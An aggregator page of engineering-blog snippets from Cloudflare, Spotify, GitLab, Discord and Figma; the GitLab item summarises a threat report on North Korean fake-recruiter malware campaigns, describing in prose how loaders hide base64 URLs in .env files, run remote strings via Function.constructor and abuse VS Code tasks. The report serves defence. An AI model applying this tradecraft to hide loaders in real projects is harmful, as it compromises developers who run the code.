11 posts
cloudflare Dynamic, identity-aware, and secure Sandbox auth 2026-04-13 Mike Nomitch Gabi Villalonga Simón As AI Large Language Models and harnesses like OpenCode and Claude Code become increasingly capable, we see more users kicking off sandboxed agents in response to chat messages, Kanban…
cloudflare Cloudflare Client-Side Security: smarter detection, now open to everyone 2026-03-30 Zhiyuan Zheng Juan Miguel Cejuela Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it need…
cloudflare How we use Abstract Syntax Trees (ASTs) to turn Workflows code into visual diagrams 2026-03-27 André Venceslau Mia Malden Cloudflare Workflows is a durable execution engine that lets you chain steps, retry on failure, and persist state across long-running processes. Developers u…
cloudflare Sandboxing AI agents, 100x faster 2026-03-24 Kenton Varda Sunil Pai Ketan Gupta Last September we introduced Code Mode, the idea that agents should perform tasks not by making tool calls, but instead by writing code that calls APIs. We've shown that simply converting an MCP serv…
cloudflare We deserve a better streams API for JavaScript 2026-02-27 James M Snell Handling data in streams is fundamental to how we build applications. To make streaming work everywhere, the WHATWG Streams Standard (informally known as "Web streams") was designed to establish a common API…
cloudflare Code Mode: give agents an entire API in 1,000 tokens 2026-02-20 Matt Carey Model Context Protocol (MCP) has become the standard way for AI agents to use external tools. But there is a tension at its core: agents need many tools to do useful work, yet every tool added fills the m…
spotify Congratulations to the recipients of the 2025 Spotify FOSS Fund TL;DR Established in 2022 as a way to help support the great open source ecosystem projects that Spotify relies on and that our developers love, the Spotify FOSS Fund provides monetary support to projects that under…
gitlab The GitLab Threat Intelligence Team has detailed its efforts to disrupt North Korean (DPRK) cyber campaigns, specifically focusing on "Contagious Interview" malware distribution and fraudulent IT worker schemes. By analyzing internal platform data, GitLab identified that these state-sponsored actors leverage legitimate tools and fake recruitment scenarios to compromise software developers and generate illicit revenue for the regime. The report concludes that while these operations are sophisticated and persistent, proactive monitoring and cross-industry intelligence sharing are essential to mitigating these evolving threats. ### Contagious Interview Mechanics * Threat actors pose as recruiters to trick software developers into executing malicious JavaScript projects under the guise of technical interviews. * The primary goal is to deploy malware families such as BeaverTail and Ottercookie, which facilitate credential theft and provide remote control of the victim's device. * A notable evolution in tradecraft includes the use of "ClickFix," a compiled BeaverTail variant identified in late 2025. * Malicious repositories often use a specific execution pattern where base64-encoded URLs and secret headers are hidden within `.env` files, masquerading as benign configuration variables. * To execute the payload, actors utilize `Function.constructor` to load strings as executable code, often triggered by custom error handlers designed to source remote content. ### 2025 Campaign Trends and Infrastructure * GitLab banned 131 unique accounts linked to these campaigns in 2025, with activity peaking in September and averaging 11 bans per month. * Nearly 90% of malicious accounts were created using Gmail addresses, and actors typically accessed the platform through consumer VPNs or dedicated VPS infrastructure. * In more than 80% of cases, malware payloads were not stored on GitLab. Instead, actors used concealed loaders to fetch content from legitimate hosting services, most commonly Vercel. * Recent tactics include the creation of malicious NPM dependencies immediately before use and the exploitation of VS Code tasks to pipe remote content into native shells. ### IT Worker Campaigns and Sanctions Evasion * Beyond malware distribution, DPRK actors use GitLab to support "IT worker" cells that generate revenue and evade international sanctions. * One identified pipeline involved the creation of at least 135 synthetic identities, automated to generate professional connections and contact leads at scale. * Threat actors have been observed adding their own images to stolen U.S. identity documents to bypass employment verification processes. * Forensic analysis revealed financial records from cell managers detailing revenue proceeds from 2022 through 2025, often earned while operating from locations like Moscow, Russia. Organizations should remain vigilant against recruitment-themed social engineering and scrutinize unexpected requests to run external code. GitLab recommends that the security community use the provided indicators of compromise to update defensive posture, as these actors continue to refine their ability to hide malicious intent within legitimate development workflows.
discord Discord leverages React and React Native to maintain high development velocity across desktop and mobile platforms while navigating the performance constraints of cross-platform frameworks. After initially avoiding React Native for Android due to hardware limitations, the company transitioned its client in 2022 by utilizing the Hermes JavaScript engine and targeting improved device capabilities. This strategic shift has allowed for significant efficiency gains, including a 50% reduction in median startup times as the team shifts focus toward optimizing experiences for power users. ### Cross-Platform Development and Android Transition * Discord uses React for desktop and React Native for mobile to allow unified feature shipping across platforms. * The company originally delayed adopting React Native on Android to avoid performance degradation on a wide range of hardware. * The formal transition to React Native for Android occurred in 2022, spurred by the introduction of Hermes, a JavaScript engine optimized for React Native. ### Performance Optimization and Efficiency * React Native introduced specific trade-offs, particularly regarding startup times on lower-end Android devices. * Discord’s engineering team successfully halved median startup times throughout 2023 through focused architectural improvements. * Current development efforts are prioritizing performance for "power users" who push the app's limits, ensuring stability and speed for high-intensity use cases. Discord’s journey highlights that while cross-platform frameworks like React Native require rigorous optimization—especially on Android—the trade-off for development speed and feature parity is increasingly viable through modern tools like the Hermes engine.
figma React at 60fps: improving scrolling comments in Figma Inside Figma Product updates Engineering Quality & performance
figma Behind the Plugins: Matt DesLauriers, Generative Artist & Creative Coder Maker Stories Profiles & interviews Plugins & tooling